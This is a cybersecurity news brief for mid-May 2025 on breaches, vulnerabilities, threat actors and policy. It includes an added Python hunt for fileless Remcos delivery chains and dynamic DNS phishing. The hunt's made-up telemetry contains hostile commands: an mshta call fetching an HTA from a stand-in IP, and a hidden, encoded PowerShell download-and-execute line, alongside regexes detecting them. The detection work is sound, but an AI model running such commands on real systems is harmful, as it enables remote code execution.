Cybersecurity Brief – 2025-05-17
Major Incidents and Breaches
- Procolored Printer Malware Incident: Official drivers distributed by printer maker Procolored were found to have been shipping malware, including a remote access trojan and a cryptocurrency stealer, for at least six months. Any host that installed the affected drivers should be treated as compromised; swapping in a clean driver is not remediation.
- Australian Human Rights Commission Data Breach: An internal error publicly exposed sensitive documents. Beyond the disclosure itself, the exposed material can be used for targeted follow-on phishing and social engineering against the people and organisations named in it.
- Coinbase Extortion: Coinbase was extorted following a cyberattack and, rather than pay, is offering a $20 million reward for information leading to the identification of the attackers, an unusual response that may set a precedent for other extortion victims.
- Nomad Bridge Crypto Hack – Arrest: Israeli authorities arrested a suspect linked to the August 2022 Nomad Bridge cryptocurrency hack, in which roughly $190 million was drained.
- US Crypto Theft Charges: Twelve more individuals have been charged in the US over their alleged roles in a $230 million cryptocurrency theft and the laundering of its proceeds.
- Email-Based Attacks and Cyber Insurance: Business email compromise (BEC) and funds transfer fraud (FTF) together accounted for 60% of cyber insurance claims in 2024. Email-borne fraud remains the most likely way an organisation actually loses money, and the controls are cheap relative to the loss: DMARC enforcement, MFA on mailboxes, and out-of-band verification of any change to payment details.
Newly Discovered Vulnerabilities
- Intel CPU Flaws: Researchers disclosed new vulnerabilities affecting all modern Intel CPUs that let an attacker leak privileged memory through Spectre v2-style branch target injection. Mitigation needs updated microcode from Intel together with OS patches, so verify both the microcode revision and the kernel's mitigation status rather than one or the other.
- Chrome Zero-Day: CISA warned that a recently patched high-severity Chrome vulnerability is being exploited in the wild. Confirm that Chrome has been restarted onto the patched build (an update that is downloaded but not applied leaves the browser vulnerable) and that Chromium-based browsers such as Edge and Brave have also picked up the fix.
- Pwn2Own Zero-Days: Multiple zero-day vulnerabilities were exploited during Pwn2Own Berlin 2025, targeting Microsoft SharePoint, VMware ESXi, Oracle VirtualBox and Red Hat Enterprise Linux. Details go to the vendors under the contest's 90-day disclosure window, so expect patches for these products over the coming months.
- Microsoft Windows 10 BitLocker Issue: Microsoft confirmed that the May 2025 security updates cause some Windows 10 systems to boot into BitLocker recovery and prompt for the recovery key. Before deploying the update broadly, verify that recovery keys for every managed device are escrowed (Active Directory, Entra ID or the MDM) so an affected machine can be unlocked rather than reimaged.
Notable Threat Actor Activity
- HTTPBot Botnet: A newly identified botnet, HTTPBot, has conducted over 200 targeted DDoS attacks, primarily affecting the gaming, technology, and education sectors.
- Remcos RAT Campaign: Attackers are delivering fileless Remcos RAT through a chain in which a malicious LNK invokes mshta.exe to run an HTA that launches PowerShell and stages the payload in memory, so no conventional executable lands on disk. Process-lineage telemetry (explorer.exe spawning mshta.exe, followed by PowerShell with hidden or encoded flags) is the most reliable place to catch it.
- Skitnet Post-Exploitation Tool: Ransomware gangs are increasingly deploying the Skitnet (“Bossnet”) malware for stealthy post-exploitation activities within compromised networks.
- Dynamic DNS Abuse: Groups including Scattered Spider are leveraging dynamic DNS services to obfuscate their infrastructure and impersonate legitimate brands during phishing and other attacks.
- Threat Actor Specialization: Threat actors are increasingly specialising (initial-access brokers, tooling developers, operators), so a single intrusion may involve several groups. This complicates attribution and means defensive models built around one monolithic adversary are increasingly inaccurate.
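The Remcos and dynamic DNS bullets above both describe behaviour that is visible in telemetry most organisations already collect. The following is an added example, not code from the brief or from any vendor: a small Python hunt that (a) flags mshta.exe processes launched directly by explorer.exe or an Office application (how an LNK target surfaces in process events), sourcing an HTA from a URL or UNC path, with a descendant PowerShell using hidden or encoded flags, and (b) flags DNS queries to free dynamic DNS zones, escalating when the host label contains a monitored brand name. All process events, domain names, the provider zone list and the brand list are constructed for illustration; the Sysmon Event ID 1 field names are simplified.

```python
"""Hunt for the LNK -> mshta.exe -> PowerShell chain and for dynamic DNS
brand impersonation over constructed telemetry (added example; the events,
names, zone list and brand list below are made up for illustration)."""
import re
from collections import defaultdict

# Constructed process-creation events (Sysmon Event ID 1, simplified).
# An LNK launch never appears as its own process: the tell is its target
# (here mshta.exe) being spawned directly by explorer.exe or an Office app.
PROCESS_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://198.51.100.7/update.hta"},
    {"pid": 300, "ppid": 200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -nop -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    # Benign control: an admin runs a local HTA from an interactive cmd.exe.
    {"pid": 400, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
    {"pid": 500, "ppid": 400, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Tools\inventory.hta"},
]

USER_FACING_PARENTS = {"explorer.exe", "winword.exe", "excel.exe", "outlook.exe"}
REMOTE_SOURCE = re.compile(r"https?://|\\\\", re.IGNORECASE)  # URL or UNC path
EVASIVE_PS = re.compile(
    r"-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|-nop\b|downloadstring|\biex\b",
    re.IGNORECASE)


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def find_mshta_chains(events, min_reasons=2):
    """Return mshta.exe processes that accumulate at least `min_reasons` indicators:
    user-facing parent, remote HTA source, evasive PowerShell descendant."""
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)

    hits = []
    for e in events:
        if _basename(e["image"]) != "mshta.exe":
            continue
        reasons = []
        parent = by_pid.get(e["ppid"])
        if parent and _basename(parent["image"]) in USER_FACING_PARENTS:
            reasons.append(f"spawned directly by {_basename(parent['image'])} (LNK/document launch)")
        if REMOTE_SOURCE.search(e["cmdline"]):
            reasons.append("HTA fetched from a remote source")
        # Walk all descendants, not only direct children: the HTA may go via cmd.exe.
        stack = list(children[e["pid"]])
        while stack:
            child = stack.pop()
            if _basename(child["image"]) in ("powershell.exe", "pwsh.exe") \
                    and EVASIVE_PS.search(child["cmdline"]):
                reasons.append(f"descendant PowerShell pid {child['pid']} uses evasion flags")
            stack.extend(children[child["pid"]])
        if len(reasons) >= min_reasons:
            hits.append({"pid": e["pid"], "cmdline": e["cmdline"], "reasons": reasons})
    return hits


# Constructed DNS query log: (client IP, queried name).
DNS_QUERIES = [
    ("10.0.0.12", "contoso-sso.duckdns.org"),
    ("10.0.0.12", "sso.contoso.com"),
    ("10.0.0.15", "okta-verify.ddns.net"),
    ("10.0.0.20", "homecam.no-ip.org"),
    ("10.0.0.21", "mail.example.com"),
]
# Illustrative, not exhaustive, zones of free dynamic DNS providers.
DYNDNS_ZONES = ("duckdns.org", "ddns.net", "no-ip.org", "hopto.org", "sytes.net")
BRANDS = ("contoso", "okta")  # your own brand plus the identity providers you use


def find_dyndns_impersonation(queries, brands=BRANDS, zones=DYNDNS_ZONES):
    """Flag queries to dynamic DNS zones; severity is high when the host label
    contains a monitored brand name (the phishing/impersonation pattern)."""
    hits = []
    for client, name in queries:
        n = name.lower().rstrip(".")
        zone = next((z for z in zones if n.endswith("." + z)), None)
        if zone is None:
            continue
        label = n[: -len(zone) - 1]
        matched = [b for b in brands if b in label]
        hits.append({"client": client, "name": n, "zone": zone, "brands": matched,
                     "severity": "high" if matched else "low"})
    return hits


if __name__ == "__main__":
    for h in find_mshta_chains(PROCESS_EVENTS):
        print(f"[process] pid {h['pid']}: " + "; ".join(h["reasons"]))
    for h in find_dyndns_impersonation(DNS_QUERIES):
        print(f"[dns] {h['severity']:<4} {h['client']} -> {h['name']} brands={h['brands']}")
```

The process hunt scores indicators rather than matching a single string so that a legitimate local HTA run from a shell (the benign control above) is not flagged, while the chain the brief describes trips three indicators at once. The DNS hunt deliberately keeps low-severity hits for dynamic DNS use without a brand label: in most corporate networks those are rare enough to review, and they are also where command-and-control infrastructure tends to sit.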
Trends, Tools, and Tactics of Interest
- Agentic AI Ransomware: Some forecasts suggest that AI-enabled, agentic ransomware, which plans and executes intrusion steps with little operator involvement, could appear as early as this year. Treat this as a projection rather than observed activity.
- AI in Security and Offence: KnowBe4 is promoting AI-driven human risk management, while OpenAI's Codex, now integrated with ChatGPT, is being rolled out to automate programming tasks. The same capability that speeds up defensive tooling also lowers the effort needed to produce working exploit and phishing code, and generated code needs the same review as any other third-party input before it reaches production.
- Code-to-Cloud Security Gaps: Security teams are struggling to keep up with the pace of modern application development, particularly as organisations rapidly adopt cloud infrastructure.
- Incident Response Metrics: Emphasis is being placed on developing and communicating clear metrics for Cybersecurity Incident Response Programs (CSIRPs) to improve transparency and decision-making.
Regulatory or Policy Developments
- CISA Directive on Chrome Vulnerability: CISA added the actively exploited Chrome vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, which under Binding Operational Directive 22-01 requires US federal civilian agencies to remediate it by the listed due date. Organisations outside the federal government commonly treat KEV due dates as a minimum patching SLA.
- Data Privacy Regulation Pressure: Regulatory scrutiny of data privacy continues to tighten, and organisations are being urged to strengthen data protection controls (data minimisation, access control, retention limits) ahead of stricter compliance requirements.